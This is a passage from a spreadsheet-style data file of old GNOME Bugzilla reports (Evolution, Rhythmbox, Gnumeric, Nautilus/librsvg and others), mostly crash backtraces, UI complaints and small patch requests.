A dialog appears saying:
Network Connection Error
Maybe no Network Connection available.
Do you want to store this report until a Network Connection is available?
Expected results:
I would expect it to submit the bug report.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>geoff+bugzilla.gnome.org</t>
  </si>
  <si>
    <t>MLVIEW-142980</t>
  </si>
  <si>
    <t>MLVIEW</t>
  </si>
  <si>
    <t>Segfaults with multiple views on document</t>
  </si>
  <si>
    <t>This applies to mlview--mainline--0.7 and mlview--mainline--0.6 :
Open a document like tests/validation/valid.xml in the mlview tree. 
Open a new view for this document by clicking on menu Action -&gt; New view on doc.
Click on Close. 
Select the last view for the document (the first which was opened for this
document). 
Try to modify the document by double-clicking on a node. It crashes.
The crash seems to happen in update_completion_widget_cb ().
I think I forgot to disconnect some signals.</t>
  </si>
  <si>
    <t>mlview-maint</t>
  </si>
  <si>
    <t>nicolas.centa</t>
  </si>
  <si>
    <t>BANSHEE-550449</t>
  </si>
  <si>
    <t>banshee.desktop doesn't follow freedesktop specs</t>
  </si>
  <si>
    <t>Please describe the problem:
desktop-file-validate reports the following problems:
banshee-1.desktop: warning: key Encoding in group Desktop Entry is deprecated
banshee-1.desktop: warning: value GNOMEApplicationAudioMusicPlayerAudioVideoX-Ximian-MainX-Novell-MainX-Red-Hat-Base for key Categories in group Desktop Entry contains a deprecated value Application
This affects to 1.2* and trunk
Thanks for fixing this
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>SEAHORSE-478422</t>
  </si>
  <si>
    <t>GNOME Keyring tab</t>
  </si>
  <si>
    <t>Not sure which module it's in but the release notes have a shot of Encryption Preferences:
http://www.gnome.org/start/2.20/notes/en/
One of the tabs is called GNOME Keyring - but GNOME could as easily be prepended to any of the other tabs and is redundant. It should just say Keyring</t>
  </si>
  <si>
    <t>GNOME-LIBS-69312</t>
  </si>
  <si>
    <t>Crash at gnome-icon-item.c:304 (get_default_font) with certain font configurations</t>
  </si>
  <si>
    <t>When I go to Settings...Preferences galeon crashes every time with this error:
GnomeUI-ERROR **: file gnome-icon-item.c: line 304 (get_default_font):
assertion failed: (default_font != NULL)
I'm using gconf 1.0.7 and libgnomeui32 1.4.1.2</t>
  </si>
  <si>
    <t>RHYTHMBOX-92659</t>
  </si>
  <si>
    <t>Group list only displays only one item at a time</t>
  </si>
  <si>
    <t>If you create a group and drag songs to the sidebar button represeting that 
group when you click the button to display that group only one line is on 
the list.  When you delete a song from a list and then click on the line 
another song replaces it but still only one song at a time is displayed.</t>
  </si>
  <si>
    <t>bokonon</t>
  </si>
  <si>
    <t>GCONF-EDITOR-128272</t>
  </si>
  <si>
    <t>gconf editor crashes if left tree is fully closed and you go to a bookmark</t>
  </si>
  <si>
    <t>Using gconf-editor 2.4.0
If you close the left hand tree all of the way so only / is showing and you
use the bookmarks menu to go to a bookmark it segfaults.  100% repeatable.
 See attached backtrace.</t>
  </si>
  <si>
    <t>EVINCE-461962</t>
  </si>
  <si>
    <t>search does not work after reload</t>
  </si>
  <si>
    <t>This bug has been filled in https://bugs.launchpad.net/ubuntu/+source/evince/+bug/126530
Binary package hint: evince
When viewing pdfs in evince 0.8.1 the search function is broken in the following sense. When you press Ctrl+f the search pane pops up at the bottom and you can search for text. If you then reload the document (via Ctrl+r) the search pane stays open all search results are cleared but the search text is still in the input field and also the next result and previous result-buttons are still visible. But if you click on one of these buttons nothing happens. By hiding the search pane and pressing Ctrl+f again the search function works again.</t>
  </si>
  <si>
    <t>GTK+-345320</t>
  </si>
  <si>
    <t>Two very similiar strings should be made equal</t>
  </si>
  <si>
    <t>In gtk/gtkfilechooserdefault.c:6768 there is the string Shortcut %s already exists whereas in gtk/gtkfilechooserdefault.c:6789 it reads shortcut %s already exists. Please make the latter s upper case to avoid the string's double translation.</t>
  </si>
  <si>
    <t>hendi</t>
  </si>
  <si>
    <t>SABAYON-318810</t>
  </si>
  <si>
    <t>SABAYON</t>
  </si>
  <si>
    <t>traceback on edit button over remote X session</t>
  </si>
  <si>
    <t>Distribution/Version: Fedora Core 4
How reproducible:
Always
Steps to Reproduce:
1. Log into X remotely
2. Start Sabayon
3. Try to edit a profile
Actual Results:  Traceback occurs and I cannot edit any profiles.
Traceback (most recent call last):
  File /usr/libexec/sabayon-session line 48 in ?
    session.start ()
  File
/var/tmp/sabayon-0.18-1-root-machbuild/usr/lib/python2.4/site-packages/sabayon/protosession.py
line 520 in start
  File
/var/tmp/sabayon-0.18-1-root-machbuild/usr/lib/python2.4/site-packages/sabayon/protosession.py
line 320 in __start_xnest
  File
/var/tmp/sabayon-0.18-1-root-machbuild/usr/lib/python2.4/site-packages/sabayon/protosession.py
line 254 in __write_temp_xauth_file
  File
/var/tmp/sabayon-0.18-1-root-machbuild/usr/lib/python2.4/site-packages/sabayon/protosession.py
line 235 in __get_xauth_record
sabayon.protosession.XauthParseError: 'xauth list' returned no records or
records in unknown format
Expected Results:  I should be able to edit profiles remotely.
Additional info:
When I login locally I can edit profiles without a traceback.
I am using Linux Terminal Server Project (LTSP) 4.1 to login remotely.
Also filed here:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170142</t>
  </si>
  <si>
    <t>sabayon-maint</t>
  </si>
  <si>
    <t>andrewz</t>
  </si>
  <si>
    <t>GNOMEICU-89829</t>
  </si>
  <si>
    <t>Segv upon user info inspection...</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GnomeICU
Severity: normal
Version: 0.98.3
Synopsis: Segv upon user info inspection...
Bugzilla-Product: GnomeICU
Bugzilla-Component: Main Window
Description:
I tried to take a look at the info of a user in my contact list
(actually i don't think they've authorized me yet) and the window began
to render (i see the canvas and the white spaces without borders for the
text input but nothing else) and then crashed...
Debugging Information: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New Thread 1024 (LWP 6901)]
[New Thread 2049 (LWP 6911)]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0x406384b9 in wait4 () from /lib/libc.so.6
#0  0x406384b9 in wait4 () from /lib/libc.so.6
#1  0x406b030c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4046283a in waitpid () from /lib/libpthread.so.0
#3  0x40099b6e in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x40460307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x080829a0 in update_personal_info ()
#7  0x401d8a8f in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#8  0x402080f6 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#9  0x40207557 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#10 0x402055cc in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x4023ca00 in gtk_widget_activate () from /usr/lib/libgtk-1.2.so.0
#12 0x401e0dd5 in gtk_menu_shell_activate_item () from /usr/lib/libgtk-1.2.so.0
#13 0x401e0065 in gtk_menu_shell_deactivate () from /usr/lib/libgtk-1.2.so.0
#14 0x401d8865 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#15 0x40207597 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#16 0x402055cc in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x4023c8cc in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#18 0x401d87dc in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#19 0x401d7999 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#20 0x4028b0c3 in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#21 0x4041afa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#22 0x4041b5a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#23 0x4041b738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#24 0x401d7297 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#25 0x080669d5 in main ()
#26 0x405a51c4 in __libc_start_main () from /lib/libc.so.6
Thread 2 (Thread 2049 (LWP 6911)):
#0  0x40662b40 in poll () from /lib/libc.so.6
#1  0x4045ccda in __pthread_manager () from /lib/libpthread.so.0
Thread 1 (Thread 1024 (LWP 6901)):
#0  0x406384b9 in wait4 () from /lib/libc.so.6
#1  0x406b030c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4046283a in waitpid () from /lib/libpthread.so.0
#3  0x40099b6e in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x40460307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x080829a0 in update_personal_info ()
#7  0x401d8a8f in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#8  0x402080f6 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#9  0x40207557 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#10 0x402055cc in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x4023ca00 in gtk_widget_activate () from /usr/lib/libgtk-1.2.so.0
#12 0x401e0dd5 in gtk_menu_shell_activate_item () from /usr/lib/libgtk-1.2.so.0
#13 0x401e0065 in gtk_menu_shell_deactivate () from /usr/lib/libgtk-1.2.so.0
#14 0x401d8865 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#15 0x40207597 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#16 0x402055cc in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x4023c8cc in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#18 0x401d87dc in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#19 0x401d7999 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#20 0x4028b0c3 in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#21 0x4041afa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#22 0x4041b5a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#23 0x4041b738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#24 0x401d7297 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#25 0x080669d5 in main ()
#26 0x405a51c4 in __libc_start_main () from /lib/libc.so.6
#0  0x406384b9 in wait4 () from /lib/libc.so.6
#0  0x406384b9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x406b030c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4046283a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40099b6e in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x40460307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x080829a0 in update_personal_info ()
No symbol table info available.
#7  0x401d8a8f in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-08-04 04:57 -------
Unknown version unspecified in product GnomeICU. Setting version to 0.94.1.
The original reporter (joshgNO@SPAMmyrealbox.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jwise@springthrough.com.
</t>
  </si>
  <si>
    <t>joshgNO</t>
  </si>
  <si>
    <t>F-SPOT-409347</t>
  </si>
  <si>
    <t>Year is covered when the date slider is over December</t>
  </si>
  <si>
    <t>Please describe the problem:
When the date slider is changed to December of any year the slider covers half of the year making the year unreadable.
Steps to reproduce:
1. Import a photo taken in December or adjust the time to be December (Edit -&gt; Adjust Time).
2. Move the slider to December
Actual results:
See description.
Expected results:
There should be either more space between the year and the slider or the slider should be smaller.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>PYGTK-136309</t>
  </si>
  <si>
    <t>GtkTreeView.map_expanded_rows wrapper</t>
  </si>
  <si>
    <t>Attached will be the wrapper for GtkTreeView.map_expanded_rows.  Diff is
against 2.2.0 rc1</t>
  </si>
  <si>
    <t>BLAM-319578</t>
  </si>
  <si>
    <t>Feeds</t>
  </si>
  <si>
    <t>Feed renders collection.xml unreadable</t>
  </si>
  <si>
    <t>Some feeds e.g. http://www.schockwellenreiter.de/xml/rss.xml seem to
render collection.xml unreadable for Blam! As I have not (yet) walked
trough the entire Blam! source I don't see how to fix that.
Reported by thomasw (at) student (dot) ethz (dot) ch</t>
  </si>
  <si>
    <t>RHYTHMBOX-320622</t>
  </si>
  <si>
    <t>check for nautilus_burn_drive_door_is_open doesn't work</t>
  </si>
  <si>
    <t>The check for nautilus_burn_drive_door_is_open doesn't seem to work.
AC_CHECK_LIB(nautilus-burn nautilus_burn_drive_door_is_open
    [AC_DEFINE([HAVE_BURN_DRIVE_DOOR] 1 [Have nautilus-burn function to check
drive door state])])
configure:23906: checking for nautilus_burn_drive_door_is_open in -lnautilus-burn
configure:23936: gcc -o conftest -g -O2   conftest.c -lnautilus-burn 
-L/usr/X11R6/lib &gt;&amp;5
/usr/bin/ld: cannot find -lnautilus-burn</t>
  </si>
  <si>
    <t>GNOME-PANEL-98914</t>
  </si>
  <si>
    <t>[ui-review] Per Panel Properties UI issues</t>
  </si>
  <si>
    <t>UI review: 
Lots of issues with this dialog:
- Keyboard navigation is broken with 'Position' (hmmm works for me)
- 'Background' is redundant in the 'type' and 'color' labels
- Frames should follow new HIG borderless/bold label style
- Would be nice to follow the desktop preferences background dialog
-- Tile Center Scale Stretch
--- Tile is better than Wallpaper? - Seth disagrees
- Background preferences should be verbalized
- s/Rotate image for vertical panels/Rotate image when panel is vertical
- Remove pixel sizes from dropdown
-- panel resizes to fit font now ie. no guarantee panel will stay that size
-- instant apply now anyway
- Position stuff for floating panels
-- Orientation:\n (o) Horizontal\n( )Vertical
-- Position:\n Horizontal: [spinner]\nVertical: [spinner]
- Corner panel lets you change offset to 0 - if you have a menu panel no
effect until you get to 16 :/
- Corner panel Position buttons are confusing
- s/Screen edge offset/Position from edge</t>
  </si>
  <si>
    <t>GNUMERIC-126883</t>
  </si>
  <si>
    <t>dswfd</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: dswfd
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
fdsfdfds
Debugging information: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0x407a3519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a3519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408139e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402757e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
#5  0x0811093d in stf_preview_render () at eval.c:41
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
#8  0x403c22b1 in gtk_marshal_NONE__NONE () at eval.c:41
#9  0x403f5916 in gtk_handlers_run () at eval.c:41
#10 0x403f4c3d in gtk_signal_real_emit () at eval.c:41
#11 0x403f29f5 in gtk_signal_emit () at eval.c:41
#12 0x403923e8 in gtk_editable_insert_text () at eval.c:41
#13 0x40393edf in gtk_entry_set_text () at eval.c:41
#14 0x0810f998 in stf_dialog_format_page_prepare () at eval.c:41
#15 0x403c2188 in gtk_marshal_NONE__POINTER () at eval.c:41
#16 0x403f5916 in gtk_handlers_run () at eval.c:41
#17 0x403f4c3d in gtk_signal_real_emit () at eval.c:41
#18 0x403f29f5 in gtk_signal_emit () at eval.c:41
#19 0x4025cb48 in gnome_druid_page_prepare () at eval.c:41
#20 0x4025bd04 in gnome_druid_set_page () at eval.c:41
#21 0x0810c554 in stf_dialog_set_scroll_region_and_prevent_center ()
    at eval.c:41
#22 0x403c1fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#23 0x403f5916 in gtk_handlers_run () at eval.c:41
#24 0x403f4c3d in gtk_signal_real_emit () at eval.c:41
#25 0x403f29f5 in gtk_signal_emit () at eval.c:41
#26 0x4025ca58 in gnome_druid_page_next () at eval.c:41
#27 0x4025b0f4 in gnome_druid_next_callback () at eval.c:41
#28 0x403c22b1 in gtk_marshal_NONE__NONE () at eval.c:41
#29 0x403f5916 in gtk_handlers_run () at eval.c:41
#30 0x403f4c3d in gtk_signal_real_emit () at eval.c:41
#31 0x403f29f5 in gtk_signal_emit () at eval.c:41
#32 0x40359f2d in gtk_button_clicked () at eval.c:41
#33 0x4035b6ed in gtk_real_button_released () at eval.c:41
#34 0x403c22b1 in gtk_marshal_NONE__NONE () at eval.c:41
#35 0x403f4ac1 in gtk_signal_real_emit () at eval.c:41
#36 0x403f29f5 in gtk_signal_emit () at eval.c:41
#37 0x40359e5d in gtk_button_released () at eval.c:41
#38 0x4035afd7 in gtk_button_button_release () at eval.c:41
#39 0x403c1fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#40 0x403f4c7d in gtk_signal_real_emit () at eval.c:41
#41 0x403f29f5 in gtk_signal_emit () at eval.c:41
#42 0x4042d0e9 in gtk_widget_event () at eval.c:41
#43 0x403c1f15 in gtk_propagate_event () at eval.c:41
#44 0x403c0f3f in gtk_main_do_event () at eval.c:41
#45 0x40478e4f in gdk_event_dispatch () at eval.c:41
#46 0x4060b7f3 in g_main_dispatch () at eval.c:41
#47 0x4060bdd9 in g_main_iterate () at eval.c:41
#48 0x4060bf8c in g_main_run () at eval.c:41
#49 0x403c0803 in gtk_main () at eval.c:41
#50 0x0810cdd8 in stf_dialog () at eval.c:41
#51 0x0808c6a5 in gnumeric_create_popup_menu () at eval.c:41
#52 0x0808c934 in gnumeric_create_popup_menu () at eval.c:41
#53 0x403c22dc in gtk_marshal_NONE__POINTER_INT () at eval.c:41
#54 0x403f5916 in gtk_handlers_run () at eval.c:41
#55 0x403f4c3d in gtk_signal_real_emit () at eval.c:41
#56 0x403f2dd9 in gtk_signal_emit_by_name () at eval.c:41
#57 0x403f1afa in gtk_selection_retrieval_report () at eval.c:41
#58 0x403f1780 in gtk_selection_notify () at eval.c:41
#59 0x403c1fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#60 0x403f4c7d in gtk_signal_real_emit () at eval.c:41
#61 0x403f29f5 in gtk_signal_emit () at eval.c:41
#62 0x4042d0e9 in gtk_widget_event () at eval.c:41
#63 0x403c0fe4 in gtk_main_do_event () at eval.c:41
#64 0x40478e4f in gdk_event_dispatch () at eval.c:41
#65 0x4060b7f3 in g_main_dispatch () at eval.c:41
#66 0x4060bdd9 in g_main_iterate () at eval.c:41
#67 0x4060bf8c in g_main_run () at eval.c:41
#68 0x403c0803 in gtk_main () at eval.c:41
#69 0x080663d2 in _start () at eval.c:41
#70 0x08066435 in main () at eval.c:41
#71 0x40705177 in __libc_start_main (main=0x8066420  argc=1 
    ubp_av=0xbffffc5c init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffffc4c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a3519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408139e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402757e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x824bd48
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 136625480
result = 0
#3  
No locals.
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x824bd48
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 136625480
result = 0
#5  0x0811093d in stf_preview_render () at eval.c:41
41	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x832bc98 H\0242\b\001
result = 0
result = 137542808
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x832bc98 H\0242\b\001
result = 0
result = 137542808
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x8320dd0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x833ab50 (2\036\b
result = 137498064
result = 137603920
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-11-13 05:04 -------
The original reporter (onikiler@mynet.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>onikiler</t>
  </si>
  <si>
    <t>EOG-166910</t>
  </si>
  <si>
    <t>Remove many from Tooltip</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/6384
Possibly we should remove many from the tooltip so it would read:
Viewdifferent types of images</t>
  </si>
  <si>
    <t>PYGTK-69532</t>
  </si>
  <si>
    <t>Warnings when destroying a GtkWidget derivative initialised with GObject.__init__</t>
  </si>
  <si>
    <t>testcase.py (pid:28039): GLib-GObject-CRITICAL **: file gobject.c: line
1347 (g_object_set_qdata_full): assertion `G_IS_OBJECT (object)' failed
testcase.py (pid:28039): GLib-GObject-CRITICAL **: file gobject.c: line
1307 (g_object_unref): assertion `G_IS_OBJECT (object)' failed</t>
  </si>
  <si>
    <t>EVOLUTION-436476</t>
  </si>
  <si>
    <t>change new appointment default from for to until</t>
  </si>
  <si>
    <t>When I make a new appointment it takes two clicks to get the form to show until rather than for in the Time section. I always use until--and have been doing so for several years now in previous versions. How can I cause that to be the default option on the new appointment form?
    Why would they take a good feature and break it anyway? It's not just the two clicks--it's the time to leave the keyboard find the mouse find the cursor and place it in the very small box click one move the cursor again to the right item click again return to keyboard. I've tried to find a keyboard way to do this without luck.
Other information:</t>
  </si>
  <si>
    <t>ebever</t>
  </si>
  <si>
    <t>GALEON-139841</t>
  </si>
  <si>
    <t>Choose the file type action dialog doesn't show filename</t>
  </si>
  <si>
    <t>The download dialog does not display the name/URL of the file to be downloaded.
When you're initiating more than one download before acting in some way on this
dialogs (by open save or cancel) you inevitably end up with some download
dialogs which offer not the slightest hint about which file/URL they're about to
act on. This is really annoying.</t>
  </si>
  <si>
    <t>joh</t>
  </si>
  <si>
    <t>TOMBOY-410314</t>
  </si>
  <si>
    <t>Remove author names from plugins that ship with Tomboy and list official Tomboy website as the website for those plugins</t>
  </si>
  <si>
    <t>For plugins that are maintained in SVN and shipped with Tomboy no individual author should be listed in the plugin preferences GUI.  The Authors listing is sufficient for giving developers credit in the GUI.
Users should be able to easily distinguish between plugins shipped with Tomboy (and therefore supported by the maintainers) and those that they may have downloaded from another source.  It makes sense for third-party plugins to individually identify their author.
The attached patch is a first cut at this that shouldn't break any freezes.  It replaces developer names with Tomboy Project (to avoid having Unavailable listed).  It also adds the WebSite property for each plugin.  I set it to http://www.beatniksoftware.com/tomboy since that is what is listed in About Tomboy.  Any input on these details is appreciated.
In the next release we should consider doing more to differentiate between official and third-party plugins in the preferences GUI.  For example instead of saying Written By: Tomboy Project that space in the GUI could read Official Tomboy Plugin or Supported Tomboy Plugin or something.</t>
  </si>
  <si>
    <t>sanfordarmstrong</t>
  </si>
  <si>
    <t>EVOLUTION-243558</t>
  </si>
  <si>
    <t>Appointment Editor always gives time validation error for apptmnts for non-UTF-8 non ASCII locales.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem: In ja_JP.PCK locale in Solaris ( I have seen the
same in zh_HK.BIG5HK locale too ) tring to enter a appntment always give
either the start time/end time validation error.
Steps to reproduce the problem:
1. Log in to ja_JP.PCK locale.
2. Bring up evolution click on the calender icon on the left side and try
to enther an apptmnt in the apptmnt editor by double clicking.
3. Always gives a time validation error
Actual Results:
The apptmnt entry is not possible.
Expected Results:
Should be able to input apptmnt.
How often does this happen? 
Always
Additional Information:</t>
  </si>
  <si>
    <t>GIMMIE-349309</t>
  </si>
  <si>
    <t>GIMMIE</t>
  </si>
  <si>
    <t>Help kill libegg</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #349256 +++
Please help kill libegg. Your module contains some egg code that is now deprecated thanks to new features most probably the new GTK+ 2.10 features like:
 + GtkRecent* (deprecating EggRecent)
 + GtkStatusIcon (deprecating EggTrayIcon and EggStatusIcon)
 + GtkCellRendererAccel (deprecating EggCellRendererKeys)
 + GtkAccelGroup now has features to deprecate EggAccelerator (see bug 85780)
Also egg-screen-exec stuff has been deprecated: see http://cvs.gnome.org/viewcvs/*checkout*/libegg/libegg/screen-exec/README
Also EggIconList has become GtkIconView in GTK+ 2.6.</t>
  </si>
  <si>
    <t>gimmie-maint</t>
  </si>
  <si>
    <t>GNOME-APPLETS-81716</t>
  </si>
  <si>
    <t>invest-applet</t>
  </si>
  <si>
    <t>Help button is missing in preference dialog box.</t>
  </si>
  <si>
    <t>Creating a patch to add help button in the preference dialog 
box and link it to the preference section of the help document.
The patch also contains Error handling while using help callback.</t>
  </si>
  <si>
    <t>EVOLUTION-252271</t>
  </si>
  <si>
    <t>Changing % Complete field always sets value at 0</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I added the % Complete column to the tasks list. When I click on the %
Complete field for a task and select 20% from the dropdown list the value
for the field is instead set to 0 (zero). Also if I type 34 directly into
the % Complete field when I hit return the value for the field is set to 0.
Expected Results:
Value for field is set correctly
Additional Information:
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.20-20.8
evolution1.5-1.5.0.200312161531-0.snap.ximian.6.1
evolution-data-server-0.0.3.0.200312161531-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libsoup2.2-2.1.2.0.200312161531-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.4.0.200312161531-0.snap.ximian.6.1
libgal21-0.23-1
libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.1.0.200312161531-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.4.0.200312161531-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.4.1-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libgnomecanvas-2.2.0.2-0.ximian.6.2
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>WEBSITE-103541</t>
  </si>
  <si>
    <t>art.gnome.org (obsolete)</t>
  </si>
  <si>
    <t>Redundant alt text on art.gnome.org</t>
  </si>
  <si>
    <t>The alt text for the images in the section headings is redundant.
eg
&lt;img src=/images/site/pill-icons/news.png 
alt=NEWS&gt; NEWS
The alt text for the icon would be better off as  as the text is already 
shown in addition to the image and people viewing the page without images 
do not need to see the word NEWS twice:
eg
[NEWS] NEWS</t>
  </si>
  <si>
    <t>mcgarry</t>
  </si>
  <si>
    <t>GNOME-DISK-UTILITY-581608</t>
  </si>
  <si>
    <t>Disks UI</t>
  </si>
  <si>
    <t>GNOME-DISK-UTILITY</t>
  </si>
  <si>
    <t>Highlight some ATA SMART attributes</t>
  </si>
  <si>
    <t>Old-age attributes exceeding threshold are not contributing to making the :drive-ata-smart-has-bad-attributes be TRUE but nonetheless we should highlight these attributes to alert the user.
It would also be nice to show FAILED_IN_THE_PAST instead of FAILING if current &gt;= threshold and worst &lt; threshold.</t>
  </si>
  <si>
    <t>gnome-disk-utility-maint</t>
  </si>
  <si>
    <t>LIBRSVG-322650</t>
  </si>
  <si>
    <t>One svg file makes nautilus crash</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Get the attached japan.svg file
2. Put it in in your home 
3. Browse your home (have show thumbnails activated)
4. Nautilus crashes  then restarts  then crashes then restartsetc...
Stack trace:
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
Thread 13 (process 5345):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x001d8404 in poll () from /lib/tls/libc.so.6
#2  0xb7507868 in g_main_context_iterate (context=0x80ef3e0 block=1 
    dispatch=1 self=0x80d7fe0) at gmain.c:2867
#3  0xb7507be5 in IA__g_main_loop_run (loop=0x8184da0) at gmain.c:2769
#4  0xb7a77e3e in IA__gtk_main () at gtkmain.c:985
#5  0x0807820e in main (argc=377 argv=0xbffff6d4) at nautilus-main.c:432
Thread 12 (process 5409):
#0  0x001017a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x003e731b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0xb7d74ce0 in libgnomeui_segv_handle ()
   from /opt/STools/gnome-2.10/lib/libgnomeui-2.so.0
#3  
#4  0xb7c3ae30 in art_svp_seg_compare ()
   from /opt/STools/gnome-2.10/lib/libart_lgpl_2.so.2
#5  0xb7c3cb16 in art_svp_merge ()
   from /opt/STools/gnome-2.10/lib/libart_lgpl_2.so.2
#6  0xb7c3ccab in art_svp_intersect ()
   from /opt/STools/gnome-2.10/lib/libart_lgpl_2.so.2
#7  0xb7e4c965 in rsvg_clip_path_merge ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#8  0xb7e590ac in rsvg_state_clip_path_assure ()
   from /opt/STools/gnome-2.10/lib/librsvg-2.so.2
#9  0xb7e590e8 in rsvg_push_discrete_layer ()
